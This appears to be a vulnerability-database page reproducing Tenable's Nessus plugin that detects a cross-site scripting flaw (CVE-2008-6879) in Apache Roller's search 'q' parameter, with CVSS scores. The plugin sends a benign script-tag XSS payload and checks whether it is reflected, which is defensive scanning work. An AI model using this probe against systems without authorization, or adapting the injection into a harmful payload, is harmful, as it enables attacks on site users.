Lucene search
This script is Copyright (C) 2009-2022 Tenable Network Security, Inc.APACHE_ROLLER_Q_XSS.NASLHistoryJan 07, 2009 - 12:00 a.m.
Apache Roller q Parameter XSS
2009-01-0700:00:00
This script is Copyright (C) 2009-2022 Tenable Network Security, Inc.
www.tenable.com
11
4.3 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
0.006 Low
EPSS
Percentile
78.2%
The remote host is running Apache Roller, a multi-user blog server written in Java.
The version of Apache Roller installed on the remote host fails to sanitize user input to the ‘q’ parameter of search requests before including it in dynamic HTML output. An attacker may be able to leverage this issue to inject arbitrary HTML and script code into a user’s browser to be executed within the security context of the affected site.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(35299);
script_version("1.16");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2008-6879");
script_bugtraq_id(33110);
script_xref(name:"SECUNIA", value:"31523");
script_name(english:"Apache Roller q Parameter XSS");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a Java web application that is affected
by a cross-site scripting vulnerability.");
script_set_attribute(attribute:"description", value:
"The remote host is running Apache Roller, a multi-user blog server
written in Java.
The version of Apache Roller installed on the remote host fails to
sanitize user input to the 'q' parameter of search requests before
including it in dynamic HTML output. An attacker may be able to
leverage this issue to inject arbitrary HTML and script code into a
user's browser to be executed within the security context of the
affected site.");
# http://mail-archives.apache.org/mod_mbox/roller-dev/200807.mbox/%[email protected]%3E
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?75c214e4");
script_set_attribute(attribute:"solution", value:
"Apply the code fix referenced in revision 668737 from the Subversion
repository.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N");
script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_cwe_id(79);
script_set_attribute(attribute:"plugin_publication_date", value:"2009/01/07");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:roller");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses : XSS");
script_copyright(english:"This script is Copyright (C) 2009-2022 Tenable Network Security, Inc.");
script_dependencies("http_version.nasl", "cross_site_scripting.nasl");
script_require_ports("Services/www", 80);
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("url_func.inc");
port = get_http_port(default:80);
if (get_kb_item("www/"+port+"/generic_xss")) exit(0);
# A simple exploit.
exploit = string("nessus<script>alert('", SCRIPT_NAME, "')</script>");
# Loop through directories.
if (thorough_tests) dirs = list_uniq(make_list("/roller", "/blogs", cgi_dirs()));
else dirs = make_list(cgi_dirs());
foreach dir (dirs)
{
# Look for Roller and its search form.
if (dir == "/") url = dir;
else url = dir + "/";
res = http_get_cache(item:url, port:port, exit_on_fail: 1);
# If...
if (
# it's Roller and...
(
'<meta name="generator" content="Roller Weblogger' >< res ||
'/roller-ui/login-redirect.rol"' >< res ||
'/roller-ui/login-redirect.jsp"' >< res ||
'<li class="rReferersListItem">' >< res ||
'ul.rMenu, ul.rFolder, ul.rFeeds, ul.rReferersList, ul.rEntriesList' >< res
) &&
# we can find the search form.
'<form id="searchForm" method="get" action="' >< res
)
{
search_url = strstr(res, '<form id="searchForm" method="get" action="') -
'<form id="searchForm" method="get" action="';
search_url = search_url - strstr(search_url, '"');
if (
strlen(search_url) > 0 &&
stridx(search_url, '/') == 0 &&
ereg(string:search_url, pattern:"^[/a-zA-Z0-9_-]+$")
)
{
# Try to exploit the issue.
url = string(search_url, "?q=", urlencode(str:exploit));
res = http_send_recv3(method:"GET", item:url, port:port);
if (res == NULL) exit(0);
# There's a problem if we see our exploit in the default search form.
if (
string("<title>Search Results for '", exploit) >< res[2] ||
string('You searched this site for "<a href="http://dictionary.com/search?q=', exploit) >< res[2]
)
{
set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);
if (report_verbosity)
{
report = string(
"\n",
"Nessus was able to exploit the issue using the following URL :\n",
"\n",
" ", build_url(port:port, qs:url), "\n"
);
security_warning(port:port, extra:report);
}
else security_warning(port);
}
}
}
}
Related
openvas
openvas
Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
2009-08-12 00:00:00
Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
2009-08-12 00:00:00
prion
prion
Cross site scripting
2009-07-30 19:30:00
nvd
nvd
CVE-2008-6879
2009-07-30 19:30:00
cvelist
cvelist
CVE-2008-6879
2022-10-03 16:13:51
cve
cve
CVE-2008-6879
2022-10-03 16:13:51
4.3 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
0.006 Low
EPSS
Percentile
78.2%
Related for APACHE_ROLLER_Q_XSS.NASL